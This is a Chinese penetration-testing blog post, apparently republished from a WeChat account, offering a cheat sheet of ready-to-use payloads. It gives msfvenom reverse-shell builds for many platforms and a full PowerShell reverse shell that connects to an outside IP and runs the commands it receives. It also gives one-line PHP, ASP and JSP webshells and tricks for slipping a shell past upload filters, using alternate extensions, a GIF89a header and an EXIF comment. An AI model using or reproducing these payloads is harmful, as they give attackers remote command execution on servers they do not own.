【干货】常见payloads: 反弹shell, webshell,Upload Bypass

admin 2023年8月9日00:56:27评论49 views字数 2057阅读6分51秒阅读模式

列举一些常见payloads: 反弹shell, webshell,Upload Bypass。

0x02 反向shell

Linux - MSFVenom

msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elfmsfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf

Windows - MSFVenom

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exemsfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe

Powershell

powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.119.194',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

ASP

msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp

ASPX

msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f aspx > shell.aspx

JSP

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war

PHP

msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php

HTA

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f hta-psh > shell.hta

DLL

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll > shell.dll

反向shell在线生成

https://weibell.github.io/reverse-shell-generator/

【干货】常见payloads: 反弹shell, webshell,Upload Bypass

0x03 简单的webshell

PHP

<?php echo passthru($_GET['cmd']); ?><?php echo shell_exec($_GET['cmd']); ?>

ASP

<% eval request("cmd") %>

JSP

<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>

0x04 文件上传绕过

后缀拓展

PHP: phtml, .php, .php3, .php4, .php5, and .inc
ASP: asp, .aspx
PERL: .pl, .pm, .cgi, .lib
JSP: .jsp, .jspx, .jsw, .jsv, and .jspf
Coldfusion: .cfm, .cfml, .cfc, .dbm

使用GIF89a

需在编写shell代码之前添加文本“GIF89a”。例如:

GIF89a;<?system($_GET['cmd']);//or you can insert your complete shell code?>

图片中包含shell

exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' lo.jpg

原文始发于微信公众号(渗透安全团队):【干货】常见payloads: 反弹shell, webshell,Upload Bypass

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月9日00:56:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【干货】常见payloads: 反弹shell, webshell,Upload Bypasshttps://cn-sec.com/archives/1942084.html

发表评论

匿名网友 填写信息